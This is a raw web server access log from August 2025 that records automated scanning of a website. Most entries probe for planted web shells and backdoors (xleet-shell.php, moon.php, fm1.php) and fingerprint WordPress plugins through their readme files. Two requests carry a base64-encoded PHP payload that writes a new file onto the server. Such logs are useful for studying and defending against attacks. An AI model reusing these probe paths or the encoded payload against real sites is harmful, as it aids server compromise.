[12/Aug/2025:11:08:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:11:12:15 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:11:12:16 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:11:12:16 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:11:12:16 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:11:12:25 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:11:12:25 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:11:12:25 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:11:12:25 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 173.252.95.8 - - [12/Aug/2025:11:14:14 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:11:16:26 -0400] "GET /ticket/vendor/htmlawed/htmlawed/gel4y.php HTTP/1.1" 301 276 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:16:32 -0400] "GET /wp-includes/sodium_compat/src/Core/Curve25519/Ge/network.php HTTP/1.1" 301 295 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:16:58 -0400] "GET /wp-content/plugins/wp-catcher/index.php HTTP/1.1" 301 274 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:17:06 -0400] "POST /ss.php HTTP/1.1" 301 241 "-" "python-requests/2.27.1" 152.42.157.60 - - [12/Aug/2025:11:17:19 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:11:17:19 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:11:17:19 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:11:17:19 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:11:20:08 -0400] "GET /wp-ver.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 66.249.74.1 - - [12/Aug/2025:11:22:04 -0400] "GET /assets/img/orth--logo.png HTTP/1.1" 301 260 "-" "Googlebot-Image/1.0" 209.38.125.40 - - [12/Aug/2025:11:22:12 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.37 - - [12/Aug/2025:11:22:12 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:11:22:15 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:11:22:15 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:11:22:37 -0400] "GET /wp-content/plugins/not/includes/about.php HTTP/1.1" 301 276 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:23:08 -0400] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa256cmFmLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 382 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:23:21 -0400] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2VlZG5rLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 382 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:23:28 -0400] "GET /wp-content/wp-cron.php?ac=3 HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:23:35 -0400] "GET /cong.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:23:46 -0400] "GET /wp-content/themes/wp-cron.php?ac=3 HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:23:48 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:23:58 -0400] "GET /css/index.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:24:23 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:25:04 -0400] "GET /.well-known/wp-cron.php?ac=3 HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:26:08 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:26:46 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:27:07 -0400] "GET /fm1.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:27:16 -0400] "GET /fm1.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 86.8.204.43 - - [12/Aug/2025:11:28:50 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:11:28:50 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:11:28:50 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:11:28:51 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:11:30:49 -0400] "GET /wp-content/plugins/wp-sec/wp.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 209.38.125.40 - - [12/Aug/2025:11:31:58 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:11:31:58 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:11:31:58 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:11:31:58 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 31.13.103.6 - - [12/Aug/2025:11:32:21 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:11:32:31 -0400] "GET /wp-content/plugins/wp-theme-editor/include.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:32:31 -0400] "GET /cong.php HTTP/1.1" 301 243 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:33:32 -0400] "GET /wp-atom.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:33:58 -0400] "GET /wp-admin/images/moon.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:34:04 -0400] "GET /.well-known/acme-challenge/moon.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:34:18 -0400] "GET /cgi-bin/moon.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:34:24 -0400] "GET /css/index.php HTTP/1.1" 301 248 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:34:31 -0400] "GET /wp-admin/js/widgets/moon.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:34:37 -0400] "GET /themes.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:34:45 -0400] "GET /wp-admin/maint/moon.php HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 43.166.247.82 - - [12/Aug/2025:11:36:45 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 149.102.237.37 - - [12/Aug/2025:11:38:35 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:11:38:35 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:11:38:35 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:11:38:35 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:11:41:42 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:11:41:42 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:11:41:42 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:11:41:42 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:11:42:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:11:42:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:11:42:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:11:42:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:11:43:56 -0400] "GET /wp-content/plugins/w0rdpr3ssnew/wp-login.php HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:43:59 -0400] "GET /wp-content/plugins/w0rdpr3ssnew/about.phpp HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:44:04 -0400] "GET /wp-content/plugins/ccx/index.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:44:07 -0400] "GET /wp-admin/includes/xleet-shell.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:44:11 -0400] "GET /fosil.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:44:23 -0400] "GET /wp-content/plugins/content-management/content.php HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:44:27 -0400] "GET /ws.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:44:30 -0400] "GET /wp-admin/user/wp-login.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:44:34 -0400] "GET /wp-includes/images/wp-login.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:44:45 -0400] "GET /xt/index.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:44:53 -0400] "GET /xleet-shell.php HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:44:55 -0400] "GET /wp-content/plugins/download-plugin/wp-access.php HTTP/1.1" 301 283 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:44:57 -0400] "GET /xleet.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:45:06 -0400] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:45:14 -0400] "GET /wp-admin/wp-login.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:45:19 -0400] "GET /wp-includes/wp-login.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:45:23 -0400] "GET /cgi-bin/wp-login.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:45:30 -0400] "GET /.wp-cli/wp-login.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:45:34 -0400] "GET /wp-content/uploads/wp-login.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:46:01 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:11:46:53 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:11:46:53 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:11:46:53 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:11:46:54 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:11:48:15 -0400] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:48:43 -0400] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:48:48 -0400] "GET /wp-content/plugins/email-posts-to-subscribers/readme.txt HTTP/1.1" 301 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:48:54 -0400] "GET /wp-content/plugins/forminator/readme.txt HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:48:57 -0400] "GET /wp-content/plugins/kadence-blocks/readme.txt HTTP/1.1" 301 279 "-" 